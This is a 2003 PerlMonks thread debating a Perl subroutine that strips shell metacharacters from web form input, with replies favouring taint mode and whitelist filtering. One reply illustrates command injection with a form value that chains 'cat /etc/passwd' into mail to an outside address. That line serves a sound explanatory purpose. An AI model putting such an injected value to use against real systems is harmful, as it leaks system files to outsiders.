antirice has asked for the wisdom of the Perl Monks concerning the following question:

I have a quick question concerning security. A friend of mine designed a sub called makeSafe.

Source:
sub makeSafe{ my $value = $_[0]; if($value =~ m/&#91;;><\*`\|&#93;/){ $value =~ s/&#91;;><\*`\|&#93;//g; } return $value; }
Anything submitted from a form to the script has this sub called on it when the variable is set. Everything is passed to a database using DBI's $dbh->execute($param1,$param2,...). He never calls system. He never calls eval. He never has a regex with the e modifier. My question is this: is this paranoia or what? When I ask him why he does this blindly, he always tells me that it's for security...so nobody can crack the box through his scripts.

Thanks in advance.

antirice    
The first rule of Perl club is - use Perl
The
ith rule of Perl club is - follow rule i - 1 for i > 1

Replies are listed 'Best First'.
Re: Security?
by grantm (Parson) on Apr 24, 2003 at 01:12 UTC

    The first rule of writing secure web applications is to never trust your input. If your code assumes that the value of a particular parameter is in a particular format then you should use a regex or similar to confirm/enforce that assumption. There are plenty of other potentially dangerous operations apart from those you list. Enabling Perl's taint mode forces the programmer to think more about what input they should accept and what operations are potentially dangerous.

    Having said that, the subroutine you supply does not confirm that input matches expectations. Instead, it looks for some bizarre literal sequence of characters and removes them if they're there. This would do absolutely nothing to achieve the stated purpose of ensuring that "nobody can crack the box through his scripts".

      I think the intent there was to do a tr/// and remove "unsafe" characters; e.g., |, >, <, etc. But the guy apparently had no clue what he was doing. ;)
      The sub was obviously not tested; otherwise, it would be obvious that it doesn't work...

      --perlplexer

        I also initially wondered whether it was meant to be a tr/// rather than a s/// but the presence of &#91; in the pattern seemed to contradict that assumption. The fact that square brackets were being treated as potentially evil led me to wonder if the code had originated in a Tcl script :-)

        Actually, he's been using it in his scripts for over a year now.

        antirice    
        The first rule of Perl club is - use Perl
        The
        ith rule of Perl club is - follow rule i - 1 for i > 1

Re: Security?
by Abigail-II (Bishop) on Apr 24, 2003 at 07:13 UTC
    Sure, his script might not call eval or system, but he's storing the data in a database, and who knows what is going to be done with that data? The next person may not be security aware.

    If the data isn't suppose to contain those characters, you have nothing to lose by filtering them out.

    Abigail

Re: Security?
by submersible_toaster (Chaplain) on Apr 24, 2003 at 06:22 UTC

    Bit like mounting a paper shreader in your letterbox as defence against junk mail! system and eval calls are some of the more obvious places that tainted or untrustworthy data can cause havoc. For example, if you were blindly running

    my $cmd = '/usr/bin/file ' . $q->param('object'); my $mimetype = `$cmd`;
    To check the mime type of a given object, of course some clown could then supply the object param as /my/dummy/object; cat /etc/passwd | mail crakd@your.boxen.com Which would probably not give your script too much trouble, but possibly email /etc/passwd to somewhere it should not be.

    Writing to a database without untainting input can also create grief, try removing an LDAP entry that has an equals sign '=' as the first character of it's CN "accidentally" inserted


    I can't believe it's not psellchecked
Re: Security?
by ajt (Prior) on Apr 24, 2003 at 08:54 UTC

    As a general rule it's safer to remove anything that doesn't match a safe pattern, rather than anything that matches an unsafe pattern. There is even an old CERT warning about this with examples in several languages, including Perl.

    Typically the best thing to do is run Perl in Taint mode (sometimes annoying on NT/IIS) and carefully de-taint your input data. As Abigail-II says though if it's not clear the next coder could removed it if they don't understand it.

    For example, this de-taints the data, and only allows though data made up of: dashes; alpha-numerics; white-spaces and the at-symbol.

    $output = $1 if ($input =~ /^([-\w\s\@]+)$/);

    See also:


    --
    ajt
Re: Security?
by nothingmuch (Priest) on Apr 24, 2003 at 11:20 UTC
    The principal he is trying to embrace is to not trust his input.
    From a secure point of view any interacting entity can possibly be malicious, intently or otherwise. This means that you must be sure not to allow anyone the oppertunity of wreaking havoc. An example of how such a concept is acheived: creating strict grammars which are tokenized into real objects, with all out of band data filtered out first allows a virtually impenetrable barrier. Because the part which deals with stuff that can be exploited, say files, or external programs only gets predefined data which is calculated based on something else, and not the actual data which is passed, it is protected from harm.

    An example is say, a file retreival utility. You make a directory tree of files, in a strict language - only alphaneumeircals, for example, with a predefined set of extensions.
    In a web form you let the user specify the filename, as a path, and the extension from a pulldown menu, or something of the sort.
    If the extension exists in a hash, goody. if not, we die.
    Then you do something like @path = grep { length $_ } map { tr/a-zA-Z0-9/cd; $_ } split("/",param("path"));. This way you only keep the legal parts of the path. anything like "/" or ".." is lost. Then you check the items one by one for existence, and if $path[$#path] exists in it's perceeders with the extension from the hash, we return it.

    What you've got to do is think how to get only what you know you'll be getting from potentially anything.

    From my non-great experience writing secure CGI's the one thing i've learned is never ever ever make shortcuts, evaluated grammers, or anything that might be cause for complex input, without checking both before interpolation, and after. You want to check the most normalized, simplified level of input more maticulously than any, because that's the one where you may fail. It is also wise to use exception handling and fatals to browser, or whatnot, because this makes sure nothing gets executed after the error either.


    This being said, I believe that if you maintain taint mode, which helps you remember how to do things properly, and you write cleanly or structurely, you can create sfe applications using eval, system, exec, or whatever. But it may be wiser to try and do without them.

    The final debate I will try to bring up is the coding style.

    Optimisation and structuring of code matters a lot. When trying to write secure code it is, in my opinion, very important to delay all optimisation to the very end, if at all, so that code auditing be made an easier task.

    Optimisation also introduces, at times, hacks and glues which are faster or shorter to type but more complex and gray in terms of their functionality or behavior. Using things like variying contexes, short idiomatic quips instead of more methods/subroutines, and so forth make maintainablity throghout prepdocution harder, and contribute to the creation of implicit behaviour. If you are trying to be secure by making sure that you don't get a case to deal with aside from the ones you know how to (which is easier (=better) than being prepared for everything) then you should also make sure your code is not doing anything you don't know it is.

    Layering is also a good aid when it comes to security. Making sure that things have to pass well defined barriers before they reach a certain level in your code adds to the clearity and robustness. Protecting namespaces, and making sure that code sections know everything about they're environment, and cannot access, via lexical scoping, hard references not being in their value set, or whatever, any data which they shouldn't. It's not only the user who can wreak havoc accidently. Bad code can also do that.

    As a last note, security is mainly learning from errors and thus correcting perception and habits.

    Kudos on the habit of thinking of this stuff, but perhaps the stuff should be thought over better. Using routines such as copying a sub from script to script makes you forget. Thinking over, for every script, what is not dangerous, and how to keep the subset of that which is needed for functionality is both a way to learn, and a way to limit more strictly.

    -nuffin
    zz zZ Z Z #!perl
Re: Security?
by antirice (Priest) on Apr 24, 2003 at 02:47 UTC
    Urg, sorry. The actual code follows:

    sub makeSafe{ my $value = $_[0]; if($value =~ m/[;><\*`\|]/){ $value =~ s/[;><\*`\|]//g; } return $value; }
    Again, sorry :-/

    antirice    
    The first rule of Perl club is - use Perl
    The
    ith rule of Perl club is - follow rule i - 1 for i > 1

      Well, the intent behind the code is kinda questionable, but let's improve it so you have something to show him.
      sub makesafe { foreach(@_) {tr/;><\*`\|//d;} }
      Now you can pass it any number of arguments you want and it's easier to read.
        what about 8bit set chars? are they safe? possible sql code? quotes? cgi meta chars like '%', '&', '=' and '?'? It's hard to exhaust this list of possiblities.

        Instead of filtering out what may be bad, we filtering in what is okay.
        tr/a-zA-Z0-9.,_-//cd; # If, for example, alphaneumericals and # '.', ',', '_', and '-' are legal inputs. # Anything else is zapped. # this is done by complementing the list # /c tells the engine to translate anything # *not* in the list.


        -nuffin
        zz zZ Z Z #!perl